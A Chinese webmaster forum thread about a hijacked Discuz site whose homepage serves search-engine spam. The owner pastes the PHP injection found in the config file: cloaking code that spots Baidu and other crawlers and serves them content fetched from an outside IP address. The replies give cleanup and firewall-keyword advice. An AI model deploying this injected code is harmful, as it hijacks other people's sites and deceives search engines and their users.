网站被劫持后发现网站首页后面加任意字符都可以访问如何解决？

网站被劫持后发现网站首页后面加任意字符都可以访问如何解决？
8 D2 p# a5 z0 O& F9 _
网站被劫持后生成了大量首页php后面加任意字符都还是可以访问
) o/ C5 }+ Y9 }% B百度收录大量的这样帖子
: i: |% \8 B% j/ C
现在如何解决这样的？
# f+ p* P$ x, R4 y, _% b/ m& |
! Z9 _  q1 H  R宝塔面板。。。。。。
* v' b( E/ A$ V; I" q
如/forum.php?123456
1 p, Y0 ^7 N, G/forum.php?12365
: k" G' G& p5 \. z/forum.php?515151

随便加都可以访问，只有首页而已其他文章帖子加就不可以。。。
% y+ \1 t% [+ ^& O% E- _9 ]) A, h! |  R

#set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://156.226.52.130");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".html")or  $tr(url,".doc")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://156.226.52.130/404.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://156.226.52.130/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}
// --------------------------  CONFIG ADMINCP  -------------------------- //
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //
2 R& s0 j# j* S8 q# d1 i

这个是加什么都可以访问，出现这种字符的原因解决了就好了。Q3160510998

你找到了劫持代码 并没有找到后门在哪，还是会出现的

cardz! 发表于 2020-11-30 06:34
这个是加什么都可以访问，出现这种字符的原因解决了就好了。Q3160510998

4 X7 Y$ ]* q5 D6 d# k3 m% P0 O8 \啥原因呀？现在是加啥都还可以访问..

1270643127 发表于 2020-11-30 11:34
5 j9 N5 p) S/ O3 U. O啥原因呀？现在是加啥都还可以访问..

谁的都可以，不只是你的。

cardz! 发表于 2020-11-30 13:54
谁的都可以，不只是你的。

那不是不能解决了？已经收录了好多了

1270643127 发表于 2020-11-30 17:40
那不是不能解决了？已经收录了好多了

你先把config里边那段代码删除，然后还要检查最近新增和修改的文件
* I: o8 U( g( x  d& ]; G. ]
你去做一个抓取测试(你自己正常访问页面，是正常的，但是蜘蛛访问，是另外一个样子)
8 r7 _( b6 Q: N% ?4 m' z5 Y如果没有注册百度站长或者百度统计，就去下面这个网址，也可以
( [' V' e( K: A" a. U5 D

1. http://stool.chinaz.com/tools/webcheck.aspx

复制代码

1 B" \8 p/ a- Y* M1 ?" ^
$ }; H  ~+ Q$ |! m) i" l如果以前的那些页面依然有问题，就说明你没有清除干净（也算不上清除干净，你删除了恶意代码，但是后门还是在的）

我自己网站的黑链网址是/?s***.后缀   清除之后，这些页面就不能访问了，然后你可以去百度提交死链，删除这些快照。当然啦，我很早以前就在robots里边直接屏蔽了【？】 所以被挂黑链半个月，百度 根本没有收录黑链。然后我发现黑链之后，直接去百度申请闭站了，解决完了才恢复的

而且你使用宝塔，宝塔有免费防火墙，你可以把恶意代码的一些关键词，比如“156.226.52.130” “$tr(url” 直接添加到防火墙。并且，定期扫描(扫描结果要分析哈，DZ默认的某些文件也会被扫描出有问题，但是并不是真的有问题)